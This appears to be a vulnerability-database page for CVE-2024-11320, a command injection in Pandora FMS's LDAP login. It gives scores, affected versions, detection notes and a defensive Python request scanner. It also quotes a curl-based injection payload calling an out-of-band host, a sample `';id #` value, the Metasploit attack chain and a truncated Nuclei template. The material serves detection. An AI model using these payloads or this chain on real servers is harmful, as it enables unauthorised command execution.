CVE-2024-11320
Published 2024-11-21
Priority P1 · 89 · Critical 9.8 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit available · EPSS 90.51% (99.8th percentile)
Arbitrary command execution on the server by exploiting a command injection vulnerability in the LDAP authentication mechanism. This issue affects Pandora FMS from 700 through 777.4 inclusive.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pandora_fms | pandora_fms | 700 – 777.4 | — |
| pandorafms | pandora_fms | >= 700 < 777.5 | 777.5 |
Detection & IOCs (extracted from sources)
- URL: POST /index.php?login=1
- URL: GET /index.php?logged=1&sec=general/logon_ok
- URL: GET /index.php?sec=general&sec2=godmode/setup/setup&section=auth
- URL: POST /index.php?sec=general&sec2=godmode/setup/setup&section=auth
- Command: ldap_admin_login=';curl xxxxzz.{{interactsh-url}} #
- Path: /index.php?sec=general&sec2=godmode/setup/setup&section=auth
- Exploit POST to /index.php?sec=general&sec2=godmode/setup/setup&section=auth with Content-Type application/x-www-form-urlencoded containing injected shell metacharacters in the ldap_admin_login parameter (e.g., ';curl ...) indicates active exploitation of CVE-2024-11320.
- Successful exploitation response contains the string 'Correctly updated the setup options' after injecting the malicious LDAP admin login payload.
- Attacker sets auth=ldap and fallback_local_auth=1 in the setup POST body as part of the injection chain; monitor for these parameters being set together with shell metacharacters in ldap_admin_login.
- The Metasploit module leverages a default DB password to create a new admin user in MySQL before exploiting the LDAP command injection; monitor for unexpected MySQL connections from external IPs and new admin user creation in Pandora FMS.
- The attack chain includes a GET to /index.php?login=1 with cookies disabled after injecting the payload, which triggers the LDAP authentication and executes the injected command server-side.
- Affected versions are Pandora FMS v7.0NG.718 through v7.0NG.777.4; presence of these versions combined with an exposed MySQL port and admin web access indicates high risk.
- Exploitation requires admin-level access to the Pandora FMS web application. The Metasploit module achieves this via a default MySQL database password to create a rogue admin account, so the MySQL port must be exposed for the full automated attack chain to work remotely.
- The injection point is specifically the ldap_admin_login field in the LDAP authentication configuration page; the vulnerability is only reachable when LDAP authentication is being configured or updated.
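An added detection helper (not from the page, the Metasploit module or Pandora FMS) that applies the notes above to request records: it flags POSTs to the auth setup page whose ldap_admin_login value carries shell metacharacters, and the auth=ldap plus fallback_local_auth=1 combination. The record format (source IP, method, URL, form body) and the sample entries are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Characters that are meaningful to a shell but have no place in an LDAP admin
# login/DN. `,` and `=` are deliberately absent because DNs contain them.
SHELL_META = re.compile(r"[;|&`'\"$(){}<>\n]")


def is_auth_setup_request(method: str, url: str) -> bool:
    """True for POST /index.php?sec=general&sec2=godmode/setup/setup&section=auth."""
    if method.upper() != "POST":
        return False
    parts = urlsplit(url)
    if parts.path != "/index.php":
        return False
    q = parse_qs(parts.query)
    return (q.get("sec2", [""])[0] == "godmode/setup/setup"
            and q.get("section", [""])[0] == "auth")


def analyse_request(method: str, url: str, body: str) -> list:
    """Return the detection findings for one request (empty list when benign)."""
    findings = []
    if not is_auth_setup_request(method, url):
        return findings
    form = parse_qs(body, keep_blank_values=True)  # decodes %xx and '+'
    login = form.get("ldap_admin_login", [""])[0]
    if SHELL_META.search(login):
        findings.append("shell metacharacters in ldap_admin_login")
    if (form.get("auth", [""])[0] == "ldap"
            and form.get("fallback_local_auth", [""])[0] == "1"):
        findings.append("auth=ldap with fallback_local_auth=1")
    return findings


# Constructed sample records: (src_ip, method, url, url-encoded form body).
SAMPLE_REQUESTS = [
    ("198.51.100.7", "GET", "/index.php?login=1", ""),
    ("198.51.100.7", "POST", "/index.php?sec=general&sec2=godmode/setup/setup&section=auth",
     "auth=ldap&ldap_admin_login=cn%3Dadmin%2Cdc%3Dexample%2Cdc%3Dorg&fallback_local_auth=0"),
    ("203.0.113.5", "POST", "/index.php?sec=general&sec2=godmode/setup/setup&section=auth",
     "auth=ldap&fallback_local_auth=1&ldap_admin_login=%27%3Bid+%23"),
]


def scan(records) -> list:
    """Return [(src_ip, findings)] for every record that triggers a finding."""
    hits = []
    for src, method, url, body in records:
        found = analyse_request(method, url, body)
        if found:
            hits.append((src, found))
    return hits
```

A legitimate admin DN such as cn=admin,dc=example,dc=org passes; only the record whose login decodes to `';id #` is reported, together with the fallback flag.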
CVSS provenance
- NVD, v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- NVD, v4.0: 6.9 MEDIUM, CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:H/VA:L/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:N/R:U/V:C/RE:M/U:Amber
No advisories linked to this vulnerability.
No detection rules found.
Metasploit
Pandora FMS authenticated command injection leading to RCE via LDAP using default DB password
Pandora FMS is a monitoring solution that provides full observability for your organization's technology. This module exploits a command injection vulnerability in the LDAP authentication mechanism of Pandora FMS. You need to have admin access to the Pandora FMS Web application in order to execute this RCE. This access can be achieved by leveraging a default password vulnerability in Pandora FMS that allows an attacker to access the Pandora FMS MySQL database, create a new admin user and gain administrative access to the Pandora FMS Web application. This attack can be remotely executed over the WAN as long as the MySQL services are exposed to the outside world. This issue affects Community, Free and E
Nuclei
CVE-2024-11320 [MEDIUM] Pandora v7.0NG.777.3 - Remote Code Execution (CVSS 6.9)
Arbitrary command execution on the server by exploiting a command injection vulnerability in the LDAP authentication mechanism. This issue affects Pandora FMS from 700 through '
```yaml
        internal: true   # closing field of the preceding matcher (the start of the template is not shown on this page)
  - raw:
      - |
        POST /index.php?login=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        nick={{username}}&pass={{password}}&login_button=Let%27s+go&csrf_code={{csrf_code}}
    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(set_cookie, 'PHPSESSID=')
        condition: and
        internal: true
  - raw:
      - |
        GET /index.php?logged=1&sec=general/logon_ok HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, 'Server health')
        condition: and
        internal: true
  - raw:
      - |
        GET /index.php?sec=general&sec2=godmo
```
No writeups or analysis indexed.